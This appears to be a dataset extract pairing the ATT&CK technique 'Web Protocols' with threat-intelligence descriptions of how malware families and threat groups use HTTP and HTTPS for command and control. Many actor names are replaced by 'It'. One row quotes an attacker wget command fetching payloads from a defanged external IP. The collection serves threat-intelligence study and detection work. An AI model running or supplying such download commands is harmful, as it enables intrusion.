prompt
stringclasses
508 values
procedure
stringlengths
20
478
Application Layer Protocol:Web Protocols
ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.
Application Layer Protocol:Web Protocols
Agent Tesla has used HTTP for C2 communications.
Application Layer Protocol:Web Protocols
Amadey has used HTTP for C2 communications.
Application Layer Protocol:Web Protocols
Anchor has used HTTP and HTTPS in C2 communications.
Application Layer Protocol:Web Protocols
ANDROMEDA has the ability to make GET requests to download files from C2.
Application Layer Protocol:Web Protocols
AppleJeus has sent data to its C2 server via POST requests.
Application Layer Protocol:Web Protocols
AppleSeed has the ability to communicate with C2 over HTTP.
Application Layer Protocol:Web Protocols
It uses HTTP for C2 communications.
Application Layer Protocol:Web Protocols
It used HTTP for C2 communications. It also used an HTTP malware variant to communicate over HTTP for C2.
Application Layer Protocol:Web Protocols
Later implants used by It, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.
Application Layer Protocol:Web Protocols
It has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.
Application Layer Protocol:Web Protocols
It has used HTTP for command and control.
Application Layer Protocol:Web Protocols
It uses HTTPS to conceal C2 communications.
Application Layer Protocol:Web Protocols
It used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.
Application Layer Protocol:Web Protocols
It has used HTTP in communications with C2.
Application Layer Protocol:Web Protocols
It used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.
Application Layer Protocol:Web Protocols
Aria-body has used HTTP in C2 communications.
Application Layer Protocol:Web Protocols
AuTo Stealer can use HTTP to communicate with its C2 servers.
Application Layer Protocol:Web Protocols
Avenger has the ability to use HTTP in communication with C2.
Application Layer Protocol:Web Protocols
BackConfig has the ability to use HTTPS for C2 communiations.
Application Layer Protocol:Web Protocols
BACKSPACE uses HTTP as a transport to communicate with its command server.
Application Layer Protocol:Web Protocols
BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.
Application Layer Protocol:Web Protocols
BADNEWS establishes a backdoor over HTTP.
Application Layer Protocol:Web Protocols
BadPatch uses HTTP for C2.
Application Layer Protocol:Web Protocols
Bankshot uses HTTP for command and control communication.
Application Layer Protocol:Web Protocols
Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.
Application Layer Protocol:Web Protocols
BBK has the ability to use HTTP in communications with C2.
Application Layer Protocol:Web Protocols
BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.
Application Layer Protocol:Web Protocols
Bisonal has used HTTP for C2 communications.
Application Layer Protocol:Web Protocols
It has used HTTP POST requests for C2.
Application Layer Protocol:Web Protocols
BlackEnergy communicates with its C2 server over HTTP.
Application Layer Protocol:Web Protocols
BlackMould can send commands to C2 in the body of HTTP POST requests.
Application Layer Protocol:Web Protocols
BLINDINGCAN has used HTTPS over port 443 for command and control.
Application Layer Protocol:Web Protocols
BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.
Application Layer Protocol:Web Protocols
BoomBox has used HTTP POST requests for C2.
Application Layer Protocol:Web Protocols
It malware has used HTTP for C2.
Application Layer Protocol:Web Protocols
Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.
Application Layer Protocol:Web Protocols
BUBBLEWRAP can communicate using HTTP or HTTPS.
Application Layer Protocol:Web Protocols
Bundlore uses HTTP requests for C2.
Application Layer Protocol:Web Protocols
During C0017, It ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.
Application Layer Protocol:Web Protocols
During C0018, the threat actors used HTTP for C2 communications.
Application Layer Protocol:Web Protocols
During C0021, the threat actors used HTTP for some of their C2 communications.
Application Layer Protocol:Web Protocols
The It malware communicates to its command server using HTTP with an encrypted payload.
Application Layer Protocol:Web Protocols
Carberp has connected to C2 servers via HTTP.
Application Layer Protocol:Web Protocols
Carbon can use HTTP in C2 communications.
Application Layer Protocol:Web Protocols
Cardinal RAT is downloaded using HTTP over port 443.
Application Layer Protocol:Web Protocols
Chaes has used HTTP for C2 communications.
Application Layer Protocol:Web Protocols
CharmPower can use HTTP to communicate with C2.
Application Layer Protocol:Web Protocols
ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.
Application Layer Protocol:Web Protocols
It has used HTTPS for C2 communications.
Application Layer Protocol:Web Protocols
China Chopper's server component executes code sent via HTTP POST commands.
Application Layer Protocol:Web Protocols
Various implementations of CHOPSTICK communicate with C2 over HTTP.
Application Layer Protocol:Web Protocols
Clambling has the ability to communicate over HTTP.
Application Layer Protocol:Web Protocols
One variant of CloudDuke uses HTTP and HTTPS for C2.
Application Layer Protocol:Web Protocols
It has used HTTPS for C2.
Application Layer Protocol:Web Protocols
Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.
Application Layer Protocol:Web Protocols
Comnie uses HTTP for C2 communication.
Application Layer Protocol:Web Protocols
ComRAT has used HTTP requests for command and control.
Application Layer Protocol:Web Protocols
It has used HTTP for C2 communications.
Application Layer Protocol:Web Protocols
CORESHELL can communicate over HTTP for C2.
Application Layer Protocol:Web Protocols
CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.
Application Layer Protocol:Web Protocols
CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.
Application Layer Protocol:Web Protocols
CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.
Application Layer Protocol:Web Protocols
CreepySnail can use HTTP for C2.
Application Layer Protocol:Web Protocols
Crimson can use a HTTP GET request to download its final payload.
Application Layer Protocol:Web Protocols
Crutch has conducted C2 communications with a Dropbox account using the HTTP API.
Application Layer Protocol:Web Protocols
CSPY Downloader can use GET requests to download additional payloads from C2.
Application Layer Protocol:Web Protocols
Cyclops Blink can download files via HTTP and HTTPS.
Application Layer Protocol:Web Protocols
Dacls can use HTTPS in C2 communications.
Application Layer Protocol:Web Protocols
DanBot can use HTTP in C2 communication.
Application Layer Protocol:Web Protocols
It's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string "&&&".
Application Layer Protocol:Web Protocols
DarkComet can use HTTP for C2 communications.
Application Layer Protocol:Web Protocols
DarkTortilla has used HTTP and HTTPS for C2.
Application Layer Protocol:Web Protocols
DarkWatchman uses HTTPS for command and control.
Application Layer Protocol:Web Protocols
Daserf uses HTTP for C2.
Application Layer Protocol:Web Protocols
DealersChoice uses HTTP for communication with the C2 server.
Application Layer Protocol:Web Protocols
DEATHRANSOM can use HTTPS to download files.
Application Layer Protocol:Web Protocols
Diavol has used HTTP GET and POST requests for C2.
Application Layer Protocol:Web Protocols
Dipsind uses HTTP for C2.
Application Layer Protocol:Web Protocols
Doki has communicated with C2 over HTTPS.
Application Layer Protocol:Web Protocols
Donut can use HTTP to download previously staged shellcode payloads.
Application Layer Protocol:Web Protocols
down_new has the ability to use HTTP in C2 communications.
Application Layer Protocol:Web Protocols
DownPaper communicates to its C2 server over HTTP.
Application Layer Protocol:Web Protocols
DRATzarus can use HTTP or HTTPS for C2 communications.
Application Layer Protocol:Web Protocols
Dridex has used POST requests and HTTPS for C2 communications.
Application Layer Protocol:Web Protocols
Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.
Application Layer Protocol:Web Protocols
DustySky has used both HTTP and HTTPS for C2.
Application Layer Protocol:Web Protocols
Dyre uses HTTPS for C2 communications.
Application Layer Protocol:Web Protocols
Egregor has communicated with its C2 servers via HTTPS protocol.
Application Layer Protocol:Web Protocols
Elise communicates over HTTP or HTTPS for C2.
Application Layer Protocol:Web Protocols
ELMER uses HTTP for command and control.
Application Layer Protocol:Web Protocols
Emissary uses HTTP or HTTPS for C2.
Application Layer Protocol:Web Protocols
Emotet has used HTTP for command and control.
Application Layer Protocol:Web Protocols
Empire can conduct command and control over protocols like HTTP and HTTPS.
Application Layer Protocol:Web Protocols
Epic uses HTTP and HTTPS for C2 communications.
Application Layer Protocol:Web Protocols
EvilBunny has executed C2 commands directly via HTTP.
Application Layer Protocol:Web Protocols
Exaramel for Linux uses HTTPS for C2 communications.
Application Layer Protocol:Web Protocols
Explosive has used HTTP for communication.
Application Layer Protocol:Web Protocols
FatDuke can be controlled via a custom C2 protocol over HTTP.
Application Layer Protocol:Web Protocols
Felismus uses HTTP for C2.